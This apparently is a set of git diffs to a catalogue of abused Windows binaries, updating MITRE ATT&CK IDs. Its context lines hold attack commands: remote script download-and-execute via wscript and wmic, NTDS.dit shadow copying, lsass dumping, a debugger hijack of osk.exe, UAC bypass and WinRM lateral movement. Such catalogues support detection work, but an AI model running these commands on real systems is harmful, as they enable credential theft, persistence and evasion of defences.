   - IOC: systeminfo.exe, fltmc.exe or schtasks.exe being executed outside of their normal path of c:\windows\system32\ or c:\windows\syswow64\
 Resources:
   - Link: https://twitter.com/eral4m/status/1451112385041911809

--- a/yml/OSBinaries/Syncappvpublishingserver.yml
+++ b/yml/OSBinaries/Syncappvpublishingserver.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows 10 1709, Windows 10 1703, Windows 10 1607
 Full_Path:
   - Path: C:\Windows\System32\SyncAppvPublishingServer.exe

--- a/yml/OSBinaries/Ttdinject.yml
+++ b/yml/OSBinaries/Ttdinject.yml
@@ -9,14 +9,14 @@ Commands:
     Usecase: Spawn process using other binary
     Category: Execute
     Privileges: Administrator
-    MitreID: T1218
+    MitreID: T1127
     OperatingSystem: Windows 10 2004
   - Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe"
     Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.
     Usecase: Spawn process using other binary
     Category: Execute
     Privileges: Administrator
-    MitreID: T1218
+    MitreID: T1127
     OperatingSystem: Windows 10 1909
 Full_Path:
   - Path: C:\Windows\System32\ttdinject.exe

--- a/yml/OSBinaries/Ttdinject.yml
+++ b/yml/OSBinaries/Ttdinject.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: Administrator
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows 10 2004
   - Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe"
     Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.
@@ -18,7 +17,6 @@ Commands:
     Category: Execute
     Privileges: Administrator
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows 10 1909
 Full_Path:
   - Path: C:\Windows\System32\ttdinject.exe

--- a/yml/OSBinaries/Tttracer.yml
+++ b/yml/OSBinaries/Tttracer.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: Administrator
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows 10 1809 and newer
   - Command: TTTracer.exe -dumpFull -attach pid
     Description: Dumps process using tttracer.exe. Requires administrator privileges
@@ -18,7 +17,6 @@ Commands:
     Category: Dump
     Privileges: Administrator
     MitreID: T1003
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1003
     OperatingSystem: Windows 10 1809 and newer
 Full_Path:
   - Path: C:\Windows\System32\tttracer.exe

--- a/yml/OSBinaries/Tttracer.yml
+++ b/yml/OSBinaries/Tttracer.yml
@@ -9,7 +9,7 @@ Commands:
     Usecase: Spawn process using other binary
     Category: Execute
     Privileges: Administrator
-    MitreID: T1218
+    MitreID: T1127
     OperatingSystem: Windows 10 1809 and newer
   - Command: TTTracer.exe -dumpFull -attach pid
     Description: Dumps process using tttracer.exe. Requires administrator privileges

--- a/yml/OSBinaries/Vbc.yml
+++ b/yml/OSBinaries/Vbc.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Compile
     Privileges: User
     MitreID: T1127
-    MitreLink: https://attack.mitre.org/techniques/T1127/
     OperatingSystem: Windows 10,7
   - Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb
     Description: Description of the second command
@@ -18,7 +17,6 @@ Commands:
     Category: Compile
     Privileges: User
     MitreID: T1127
-    MitreLink: https://attack.mitre.org/techniques/T1127/
     OperatingSystem: Windows 10,7
 Full_Path:
   - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe

--- a/yml/OSBinaries/Verclsid.yml
+++ b/yml/OSBinaries/Verclsid.yml
@@ -9,7 +9,7 @@ Commands:
     Usecase: Run a com object created in registry to evade defensive counter measures
     Category: Execute
     Privileges: User
-    MitreID: T1218
+    MitreID: T1218.012
     OperatingSystem: Windows 10
 Full_Path:
   - Path: C:\Windows\System32\verclsid.exe

--- a/yml/OSBinaries/Verclsid.yml
+++ b/yml/OSBinaries/Verclsid.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows 10
 Full_Path:
   - Path: C:\Windows\System32\verclsid.exe

--- a/yml/OSBinaries/Wab.yml
+++ b/yml/OSBinaries/Wab.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: Administrator
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Program Files\Windows Mail\wab.exe

--- a/yml/OSBinaries/Wmic.yml
+++ b/yml/OSBinaries/Wmic.yml
@@ -9,8 +9,7 @@ Commands:
     Usecase: Execute binary file hidden in Alternate data streams to evade defensive counter measures
     Category: ADS
     Privileges: User
-    MitreID: T1096
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
+    MitreID: T1564.004
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: wmic.exe process call create calc
     Description: Execute calc from wmic
@@ -18,7 +17,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: wmic.exe process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
     Description: Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well.
@@ -26,7 +24,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe"
     Description: Execute evil.exe on the remote system.
@@ -34,7 +31,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt"
     Description: Create a scheduled execution of C:\GoogleUpdate.exe to run at 9pm.
@@ -42,7 +38,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit"
     Description: Create a volume shadow copy of NTDS.dit that can be copied.
@@ -50,7 +45,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl"
     Description: Create a volume shadow copy of NTDS.dit that can be copied.
@@ -58,7 +52,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"
     Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet.
@@ -66,7 +59,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\wbem\wmic.exe

--- a/yml/OSBinaries/WorkFolders.yml
+++ b/yml/OSBinaries/WorkFolders.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218/
     OperatingSystem: Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\WorkFolders.exe

--- a/yml/OSBinaries/Wscript.yml
+++ b/yml/OSBinaries/Wscript.yml
@@ -9,16 +9,14 @@ Commands:
     Usecase: Execute hidden code to evade defensive counter measures
     Category: ADS
     Privileges: User
-    MitreID: T1096
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
+    MitreID: T1564.004
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js
     Description: Download and execute script stored in an alternate data stream
     Usecase: Execute hidden code to evade defensive counter measures
     Category: ADS
     Privileges: User
-    MitreID: T1096
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
+    MitreID: T1564.004
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\wscript.exe

--- a/yml/OSBinaries/Wsreset.yml
+++ b/yml/OSBinaries/Wsreset.yml
@@ -9,8 +9,7 @@ Commands:
     Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
     Category: UAC bypass
     Privileges: User
-    MitreID: T1088
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1088
+    MitreID: T1548.002
     OperatingSystem: Windows 10
 Full_Path:
   - Path: C:\Windows\System32\wsreset.exe

--- a/yml/OSBinaries/Wuauclt.yml
+++ b/yml/OSBinaries/Wuauclt.yml
@@ -9,8 +9,7 @@ Commands:
     Usecase: Execute dll via attach/detach methods
     Category: Execute
     Privileges: User
-    MitreID: T1085
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1085
+    MitreID: T1218.011
     OperatingSystem: Windows 10
 Full_Path:
   - Path: C:\Windows\System32\wuauclt.exe

--- a/yml/OSBinaries/Xwizard.yml
+++ b/yml/OSBinaries/Xwizard.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}
     Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds.
@@ -18,7 +17,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM
     Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file.
@@ -26,7 +24,6 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows 10
 Full_Path:
   - Path: C:\Windows\System32\xwizard.exe

--- a/yml/OSLibraries/Advpack.yml
+++ b/yml/OSLibraries/Advpack.yml
@@ -9,39 +9,36 @@ Commands:
     Usecase: Run local or remote script(let) code through INF file specification.
     Category: AWL Bypass
     Privileges: User
-    MitreID: T1085
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1085
+    MitreID: T1218.011
     OperatingSystem: Windows
   - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,,1,
     Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).
     Usecase: Run local or remote script(let) code through INF file specification.
     Category: AWL Bypass
     Privileges: User
-    MitreID: T1085
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1085
+    MitreID: T1218.011
     OperatingSystem: Windows
   - Command: rundll32.exe advpack.dll,RegisterOCX test.dll
     Description: Launch a DLL payload by calling the RegisterOCX function.
     Usecase: Load a DLL payload.
     Category: Execute
     Privileges: User
-    MitreID: T1085
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1085
+    MitreID: T1218.011
     OperatingSystem: Windows
   - Command: rundll32.exe advpack.dll,RegisterOCX calc.exe
     Description: Launch an executable by calling the RegisterOCX function.
     Usecase: Run an executable payload.
     Category: Execute
     Privileges: User
-    MitreID: T1085
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1085
+    MitreID: T1218.011
+    OperatingSystem: Windows
   - Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe"
     Description: Launch command line by calling the RegisterOCX function.
     Usecase: Run an executable payload.
     Category: Execute
     Privileges: User
-    MitreID: T1085
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1085
+    MitreID: T1218.011
+    OperatingSystem: Windows 10
 Full_Path:
   - Path: c:\windows\system32\advpack.dll
   - Path: c:\windows\syswow64\advpack.dll

--- a/yml/OSLibraries/Ieadvpack.yml
+++ b/yml/OSLibraries/Ieadvpack.yml
@@ -9,39 +9,34 @@ Commands:
     Usecase: Run local or remote script(let) code through INF file specification.
     Category: AWL Bypass
     Privileges: User
-    MitreID: T1085
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1085
+    MitreID: T1218.011
     OperatingSystem: Windows
   - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1,
     Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).
     Usecase: Run local or remote script(let) code through INF file specification.
     Category: AWL Bypass
     Privileges: User
-    MitreID: T1085
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1085
+    MitreID: T1218.011
     OperatingSystem: Windows
   - Command: rundll32.exe ieadvpack.dll,RegisterOCX test.dll
     Description: Launch a DLL payload by calling the RegisterOCX function.
     Usecase: Load a DLL payload.
     Category: Execute
     Privileges: User
-    MitreID: T1085
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1085
+    MitreID: T1218.011
     OperatingSystem: Windows
   - Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe
     Description: Launch an executable by calling the RegisterOCX function.
     Usecase: Run an executable payload.
     Category: Execute
     Privileges: User
-    MitreID: T1085
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1085
+    MitreID: T1218.011
   - Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe"
     Description: Launch command line by calling the RegisterOCX function.
     Usecase: Run an executable payload.
     Category: Execute
     Privileges: User
-    MitreID: T1085
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1085
+    MitreID: T1218.011
 Full_Path:
   - Path: c:\windows\system32\ieadvpack.dll
   - Path: c:\windows\syswow64\ieadvpack.dll

--- a/yml/OSLibraries/Ieframe.yml
+++ b/yml/OSLibraries/Ieframe.yml
@@ -9,8 +9,7 @@ Commands:
     UseCase: Load an executable payload by calling a .url file with or without quotes.  The .url file extension can be renamed.
     Category: Execute
     Privileges: User
-    MitreID: T1085
-    MItreLink: https://attack.mitre.org/wiki/Technique/T1085
+    MitreID: T1218.011
     OperatingSystem: Windows
 Full_Path:
   - Path: c:\windows\system32\ieframe.dll

--- a/yml/OSLibraries/Mshtml.yml
+++ b/yml/OSLibraries/Mshtml.yml
@@ -9,8 +9,7 @@ Commands:
     Usecase: Launch an HTA application.
     Category: Execute
     Privileges: User
-    MitreID: T1085
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1085
+    MitreID: T1218.011
     OperatingSystem: Windows
 Full_Path:
   - Path: c:\windows\system32\mshtml.dll

--- a/yml/OSLibraries/Pcwutl.yml
+++ b/yml/OSLibraries/Pcwutl.yml
@@ -9,8 +9,7 @@ Commands:
     Usecase: Launch an executable.
     Category: Execute
     Privileges: User
-    MitreID: T1085
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1085
+    MitreID: T1218.011
     OperatingSystem: Windows
 Full_Path:
   - Path: c:\windows\system32\pcwutl.dll

--- a/yml/OSLibraries/Setupapi.yml
+++ b/yml/OSLibraries/Setupapi.yml
@@ -9,16 +9,14 @@ Commands:
     UseCase: Run local or remote script(let) code through INF file specification.
     Category: AWL Bypass
     Privileges: User
-    MitreID: T1085
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1085
+    MitreID: T1218.011
     OperatingSystem: Windows
   - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\calc_exe.inf
     Description: Launch an executable file via the InstallHinfSection function and .inf file section directive.
     UseCase: Load an executable payload.
     Category: Execute
     Privileges: User
-    MitreID: T1085
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1085
+    MitreID: T1218.011
     OperatingSystem: Windows
 Full_Path:
   - Path: c:\windows\system32\setupapi.dll

--- a/yml/OSLibraries/Shdocvw.yml
+++ b/yml/OSLibraries/Shdocvw.yml
@@ -9,8 +9,7 @@ Commands:
     Usecase: Load an executable payload by calling a .url file with or without quotes.  The .url file extension can be renamed.
     Category: Execute
     Privileges: User
-    MitreID: T1085
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1085
+    MitreID: T1218.011
     OperatingSystem: Windows
 Full_Path:
   - Path: c:\windows\system32\shdocvw.dll

--- a/yml/OSLibraries/Shell32.yml
+++ b/yml/OSLibraries/Shell32.yml
@@ -9,23 +9,20 @@ Commands:
     Usecase: Load a DLL payload.
     Category: Execute
     Privileges: User
-    MitreID: T1085
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1085
+    MitreID: T1218.011
     OperatingSystem: Windows
   - Command: rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe
     Description: Launch an executable by calling the ShellExec_RunDLL function.
     Usecase: Run an executable payload.
     Category: Execute
     Privileges: User
-    MitreID: T1085
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1085
+    MitreID: T1218.011
   - Command: rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi"
     Description: Launch command line by calling the ShellExec_RunDLL function.
     Usecase: Run an executable payload.
     Category: Execute
     Privileges: User
-    MitreID: T1085
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1085
+    MitreID: T1218.011
 Full_Path:
   - Path: c:\windows\system32\shell32.dll
   - Path: c:\windows\syswow64\shell32.dll

--- a/yml/OSLibraries/Syssetup.yml
+++ b/yml/OSLibraries/Syssetup.yml
@@ -9,16 +9,14 @@ Commands:
     Usecase: Run local or remote script(let) code through INF file specification (Note May pop an error window).
     Category: AWL Bypass
     Privileges: User
-    MitreID: T1085
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1085
+    MitreID: T1218.011
     OperatingSystem: Windows
   - Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf
     Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive.
     Usecase: Load an executable payload.
     Category: Execute
     Privileges: User
-    MitreID: T1085
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1085
+    MitreID: T1218.011
     OperatingSystem: Windows
 Full_Path:
   - Path: c:\windows\system32\syssetup.dll

--- a/yml/OSLibraries/Url.yml
+++ b/yml/OSLibraries/Url.yml
@@ -9,48 +9,42 @@ Commands:
     Usecase: Invoke an HTML Application via mshta.exe (Default Handler).
     Category: Execute
     Privileges: User
-    MitreID: T1085
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1085
+    MitreID: T1218.011
     OperatingSystem: Windows
   - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.url"
     Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.
     Usecase: Load an executable payload by calling a .url file with or without quotes.
     Category: Execute
     Privileges: User
-    MitreID: T1085
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1085
+    MitreID: T1218.011
     OperatingSystem: Windows
   - Command: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
     Description: Launch an executable by calling OpenURL.
     Usecase: Load an executable payload by specifying the file protocol handler (obfuscated).
     Category: Execute
     Privileges: User
-    MitreID: T1085
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1085
+    MitreID: T1218.011
     OperatingSystem: Windows
   - Command: rundll32.exe url.dll,FileProtocolHandler calc.exe
     Description: Launch an executable by calling FileProtocolHandler.
     Usecase: Launch an executable.
     Category: Execute
     Privileges: User
-    MitreID: T1085
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1085
+    MitreID: T1218.011
     OperatingSystem: Windows
   - Command: rundll32.exe url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
     Description: Launch an executable by calling FileProtocolHandler.
     Usecase: Load an executable payload by specifying the file protocol handler (obfuscated).
     Category: Execute
     Privileges: User
-    MitreID: T1085
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1085
+    MitreID: T1218.011
     OperatingSystem: Windows
   - Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta
     Description: Launch a HTML application payload by calling FileProtocolHandler.
     Usecase: Invoke an HTML Application via mshta.exe (Default Handler).
     Category: Execute
     Privileges: User
-    MitreID: T1085
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1085
+    MitreID: T1218.011
     OperatingSystem: Windows
 Full_Path:
   - Path: c:\windows\system32\url.dll

--- a/yml/OSLibraries/Zipfldr.yml
+++ b/yml/OSLibraries/Zipfldr.yml
@@ -9,16 +9,14 @@ Commands:
     Usecase: Launch an executable.
     Category: Execute
     Privileges: User
-    MitreID: T1085
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1085
+    MitreID: T1218.011
     OperatingSystem: Windows
   - Command: rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
     Description: Launch an executable payload by calling RouteTheCall (obfuscated).
     Usecase: Launch an executable.
     Category: Execute
     Privileges: User
-    MitreID: T1085
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1085
+    MitreID: T1218.011
     OperatingSystem: Windows
 Full_Path:
   - Path: c:\windows\system32\zipfldr.dll

--- a/yml/OSLibraries/comsvcs.yml
+++ b/yml/OSLibraries/comsvcs.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Dump
     Privileges: SYSTEM
     MitreID: T1003
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1003
     OperatingSystem: Windows
 Full_Path:
   - Path: c:\windows\system32\comsvcs.dll

--- a/yml/OSLibraries/comsvcs.yml
+++ b/yml/OSLibraries/comsvcs.yml
@@ -9,7 +9,7 @@ Commands:
     Usecase: Dump Lsass.exe process memory to retrieve credentials.
     Category: Dump
     Privileges: SYSTEM
-    MitreID: T1003
+    MitreID: T1003.001
     OperatingSystem: Windows
 Full_Path:
   - Path: c:\windows\system32\comsvcs.dll

--- a/yml/OSScripts/CL_LoadAssembly.yml
+++ b/yml/OSScripts/CL_LoadAssembly.yml
@@ -9,7 +9,7 @@ Commands:
     Usecase: Execute proxied payload with Microsoft signed binary
     Category: Execute
     Privileges: User
-    MitreID: T1059.001
+    MitreID: T1216
     OperatingSystem: Windows 10 21H1 (likely other versions as well)
 Full_Path:
   - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1

--- a/yml/OSScripts/CL_LoadAssembly.yml
+++ b/yml/OSScripts/CL_LoadAssembly.yml
@@ -10,13 +10,12 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1059.001
-    MitreLink: https://attack.mitre.org/techniques/T1059/001/
     OperatingSystem: Windows 10 21H1 (likely other versions as well)
 Full_Path:
   - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1
-Code_Sample: 
+Code_Sample:
   - Code:
-Detection: 
+Detection:
   - IOC:
 Resources:
   - Link: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/

--- a/yml/OSScripts/CL_mutexverifiers.yml
+++ b/yml/OSScripts/CL_mutexverifiers.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1216
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
     OperatingSystem: Windows 10
 Full_Path:
   - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1

--- a/yml/OSScripts/Cl_invocation.yml
+++ b/yml/OSScripts/Cl_invocation.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1216
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
     OperatingSystem: Windows 10
 Full_Path:
   - Path: C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1

--- a/yml/OSScripts/Manage-bde.yml
+++ b/yml/OSScripts/Manage-bde.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1216
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
     OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: copy c:\users\person\evil.exe c:\users\public\manage-bde.exe & cd c:\users\public\ & cscript.exe c:\windows\system32\manage-bde.wsf
     Description: Run the manage-bde.wsf script with a payload named manage-bde.exe in the same directory to run the payload file.
@@ -18,7 +17,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1216
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
     OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\manage-bde.wsf

--- a/yml/OSScripts/Pubprn.yml
+++ b/yml/OSScripts/Pubprn.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1216
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
     OperatingSystem: Windows 10
 Full_Path:
   - Path: C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs

--- a/yml/OSScripts/Pubprn.yml
+++ b/yml/OSScripts/Pubprn.yml
@@ -9,7 +9,7 @@ Commands:
     Usecase: Proxy execution
     Category: Execute
     Privileges: User
-    MitreID: T1216
+    MitreID: T1216.001
     OperatingSystem: Windows 10
 Full_Path:
   - Path: C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs

--- a/yml/OSScripts/Syncappvpublishingserver.yml
+++ b/yml/OSScripts/Syncappvpublishingserver.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1216
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
     OperatingSystem: Windows 10
 Full_Path:
   - Path: C:\Windows\System32\SyncAppvPublishingServer.vbs

--- a/yml/OSScripts/UtilityFunctions.yml
+++ b/yml/OSScripts/UtilityFunctions.yml
@@ -10,13 +10,12 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1059.001
-    MitreLink: https://attack.mitre.org/techniques/T1059/001/
     OperatingSystem: Windows 10 21H1 (likely other versions as well)
 Full_Path:
   - Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1
-Code_Sample: 
+Code_Sample:
   - Code:
-Detection: 
+Detection:
   - IOC:
 Resources:
   - Link: https://twitter.com/nickvangilder/status/1441003666274668546

--- a/yml/OSScripts/UtilityFunctions.yml
+++ b/yml/OSScripts/UtilityFunctions.yml
@@ -9,7 +9,7 @@ Commands:
     Usecase: Execute proxied payload with Microsoft signed binary
     Category: Execute
     Privileges: User
-    MitreID: T1059.001
+    MitreID: T1216
     OperatingSystem: Windows 10 21H1 (likely other versions as well)
 Full_Path:
   - Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1

--- a/yml/OSScripts/Winrm.yml
+++ b/yml/OSScripts/Winrm.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1216
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
     OperatingSystem: Windows 10
   - Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985   \nwinrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985'
     Description: Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol
@@ -18,7 +17,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1216
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
     OperatingSystem: Windows 10
   - Command: '%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty'
     Description: Bypass AWL solutions by copying and executing cscript.exe and malicious XSL documents from attacker controlled location
@@ -26,7 +24,6 @@ Commands:
     Category: AWL Bypass
     Privileges: User
     MitreID: T1216
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
     OperatingSystem: Windows 10
